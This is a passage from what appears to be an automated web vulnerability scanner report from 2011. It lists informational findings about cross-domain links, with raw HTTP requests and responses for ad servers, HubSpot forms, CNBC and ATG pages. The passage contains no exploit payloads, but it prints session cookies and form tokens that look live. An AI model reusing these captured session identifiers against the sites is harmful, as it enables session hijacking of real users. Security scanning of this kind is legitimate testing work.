Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:51:56 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9405

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C85%2C104&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C85%2C104&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C85%2C104&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=125%2C85%2C104&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=125%2C85%2C104&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=125%2C85%2C104&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C85%2C104&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/58k58g8oxm.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C85%2C104&t=11">1 Secret To Joint Relief</a></span>
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C85%2C104&t=11">This ridiculously easy way to relieve joints will leave you amazed... <br />
...[SNIP]...

19.70. http://serve.directdigitalllc.com/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315343244277&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 16:07:27 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9372

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C125%2C1&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C125%2C1&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C125%2C1&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C125%2C1&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C125%2C1&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C125%2C1&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=85%2C125%2C1&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/803znrzpc6.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=85%2C125%2C1&t=11">How to Relieve Joints?</a></span>
<a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=85%2C125%2C1&t=11">Shocking Discovery by Boston Researchers for Amazing Joint Relief... <br />
...[SNIP]...

19.71. http://sophelle.web5.hubspot.com/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sophelle.web5.hubspot.com
Path:   /Default.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

POST /Default.aspx?app=iframeform&hidemenu=true&ContactFormID=26423 HTTP/1.1
Host: sophelle.web5.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/CQ/free-trial.html
Content-Length: 1030
Cache-Control: max-age=0
Origin: http://www.sophelle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=5iCeoaShzAEkAAAAZTQ1M2FhMjItYzUyOS00Njk1LWExNWEtYzg1MmNiNDE2NGZh0; ASP.NET_SessionId=ywiv3nvqvyjcg5bljy1p2zeg; HUBSPOT19980=537990316.0.0000

FormSubmitRedirectURL=http%3A%2F%2Fwww.sophelle.com%2Fproducts%2Fcq%2Fthank-you-trial.html&Lead_Src=Free+Trial+Long+Form+%7C+Contact+Us&LeadGen_ContactForm_26423_m0submitter_user_token=9c6ca7a5ca1546b
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:28:24 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.sophelle.com/products/cq/thank-you-trial.html
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.sophelle.com/products/cq/thank-you-trial.html">here</a>.</h2>
</body></html>

19.72. http://sophelle.web5.hubspot.com/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sophelle.web5.hubspot.com
Path:   /Default.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

POST /Default.aspx?app=iframeform&hidemenu=true&ContactFormID=14884 HTTP/1.1
Host: sophelle.web5.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Contact-Us/
Content-Length: 1008
Cache-Control: max-age=0
Origin: http://www.sophelle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=5iCeoaShzAEkAAAAZTQ1M2FhMjItYzUyOS00Njk1LWExNWEtYzg1MmNiNDE2NGZh0

FormSubmitRedirectURL=http%3A%2F%2Fwww.sophelle.com%2FContact-Us%2Fthank-you.html&Lead_Src=Contact+Us+%7C+Contact+Us&LeadGen_ContactForm_14884_m0submitter_user_token=9c6ca7a5ca1546b9a6b60f57cca70bb6&C
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:28:01 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.sophelle.com/Contact-Us/thank-you.html
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 166

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.sophelle.com/Contact-Us/thank-you.html">here</a>.</h2>
</body></html>

19.73. http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thinkwrap.com
Path:   /wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js?ver=2.9.2 HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:36 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 23 Aug 2010 11:42:00 GMT
ETag: "1a1d0-3c27-48e7c22eeb200"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 15399
Content-Type: application/javascript
(function($){$.prettyPhoto={version:'2.5.4'};$.fn.prettyPhoto=function(settings){settings=jQuery.extend({animationSpeed:'normal',padding:40,opacity:0.80,showTitle:true,allowresize:true,counter_separa
...[SNIP]...
<param name="movie" value="http://www.youtube.com/v/'+grab_param('v',images[setPosition])+'" /><embed src="http://www.youtube.com/v/'+grab_param('v',images[setPosition])+'" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="'+correctSizes['width']+'" height="'+correctSizes['height']+'"></embed></object>';}else if(pp_type=='quicktime'){pp_typeMarkup='<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" codebase="http://www.apple.com/qtactivex/qtplugin.cab" height="'+correctSizes['height']+'" width="'+correctSizes['width']+'"><param name="src" value="'+images[setPosition]+'">
...[SNIP]...

19.74. http://ticker.cnbc.com/scripts/cnbc_ticker.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ticker.cnbc.com
Path:   /scripts/cnbc_ticker.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /scripts/cnbc_ticker.js?v=C0950 HTTP/1.1
Host: ticker.cnbc.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Fri, 28 Aug 2009 14:56:14 GMT
ETag: "6c6b-47234e2b19f80"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 27755
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 15:00:12 GMT
Connection: close


var isIE=navigator.appName.indexOf("Microsoft")>-1;var saved_cnbc_video_setURL=null;var cnbc_MONTH_NAMES=new Array('January','February','March','April','May','June','July','August','September','Octo
...[SNIP]...
<param name="allowScriptAccess" value="always" />'+'<embed id="'+variableName+'" name="'+variableName+'" play="true" src="http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'" AllowScriptAccess="always" quality="high" bgcolor="#ffffff" width="1" height="1" align="middle" type="application/x-shockwave-flash" /></object>
...[SNIP]...
<param name="movie" value="http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'" />');document.write('<embed id="'+varName+'" name="'+varName+'" play="true" src="http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'" AllowScriptAccess="always" quality="high" bgcolor="#ffffff" width="1" height="1" align="middle" type="application/x-shockwave-flash" />');document.write('</object>
...[SNIP]...

19.75. http://www.atg.com/service/main.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atg.com
Path:   /service/main.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.atg.com/en/solutions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Content-Language: en-US
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:35:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:35:19 GMT
Content-Length: 110653
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe
...[SNIP]...
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.76. https://www.atg.com/en/password/request/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /en/password/request/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /en/password/request/?successURL=/en/password/request/success/&_requestid=161697 HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/en/password/request/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:56:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:56:23 GMT
Content-Length: 27516
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   
   <title>Request Passwor
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/stylesheets/safari-fixes.css?version=5">
   <script type="text/javascript" src="https://static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

19.77. https://www.atg.com/service/main.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /service/main.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8 HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: http://www.atg.com/service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Content-Language: 7cd9f92e1f6617753dfce39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:37:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:37:31 GMT
Content-Length: 62157
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

